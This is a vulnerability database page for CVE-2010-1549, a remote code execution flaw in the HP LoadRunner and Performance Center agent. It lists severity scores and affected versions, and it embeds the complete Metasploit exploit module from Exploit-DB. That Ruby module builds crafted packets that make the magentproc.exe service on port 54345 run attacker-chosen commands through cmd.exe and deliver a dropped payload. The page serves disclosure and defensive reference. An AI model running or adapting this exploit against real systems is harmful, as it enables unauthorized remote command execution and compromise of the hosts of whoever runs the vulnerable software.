CVE-2010-1549 : Detail


15h43 +00:00
16h57 +00:00
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CVE Descriptions

Unspecified vulnerability in the Agent in HP LoadRunner before 9.50 and HP Performance Center before 9.50 allows remote attackers to execute arbitrary code via unknown vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.


Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]


EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 43411

Publication date : 2017-12-31 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: # Current source: ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution", 'Description' => %q{ This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are also most likely vulneable if the (non-default) SSL option is turned off. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default). }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Original discovery # From Tenable Network Security 'aushack' # metasploit module ], 'References' => [ ['CVE', '2010-1549'], ['ZDI', '10-080'], ['BID', '39965'], ['URL', ''] ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, 'Platform' => 'win', 'Targets' => [ # Note: software reportedly supports Linux - may also be vulnerable. ['Windows (Dropper)', 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] ], ], 'Privileged' => false, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => 'May 06 2010', 'DefaultTarget' => 0)) register_options([Opt::RPORT(54345)]) end def autofilter true end def execute_command(cmd, _opts = {}) guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17)) randstr = Rex::Text.rand_text_alpha(16) server_name = Rex::Text.rand_text_alpha(7) server_ip = datastore['LHOST'] server_port = Rex::Text.rand_text_numeric(4) # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd cmd1 = "C:\\Windows\\system32\\cmd.exe" cmd2 = "/C \"#{cmd}\"" pkt1 = [0x19].pack('N') + guid + '0' pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})" pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00" pkt2 << [0x7530].pack('N') pkt3 = [4 + pkt2.length].pack('N') + pkt2 pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3 pkt5 = [pkt4.length].pack('N') + pkt4 pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N') pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N') pkt7 = [4 + pkt6.length].pack('N') + pkt6 pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7 pkt9 = [pkt8.length].pack('N') + pkt8 sploit = pkt1 + pkt5 + pkt9 connect sock.put(sploit) disconnect end def exploit print_status('Sending payload...') execute_cmdstager(linemax: 1500) end end

Products Mentioned

Configuraton 0

Hp>>Loadrunner >> Version To (including) 9.10

Hp>>Loadrunner >> Version 7.0

    Hp>>Loadrunner >> Version 7.02

      Hp>>Loadrunner >> Version 7.5

        Hp>>Loadrunner >> Version 7.6

          Hp>>Loadrunner >> Version 7.8

            Hp>>Loadrunner >> Version 7.51

              Hp>>Loadrunner >> Version 8.0

                Hp>>Loadrunner >> Version 8.12

                  Hp>>Loadrunner >> Version 8.13

                    Hp>>Loadrunner >> Version 8.14

                      Hp>>Loadrunner >> Version 9.0

                        Hp>>Performance_center >> Version To (including) 9.0

                          Microsoft>>Windows >> Version *


                          Tags : vendor-advisory, x_refsource_HP
                          Tags : vendor-advisory, x_refsource_HP
                          Tags : exploit, x_refsource_EXPLOIT-DB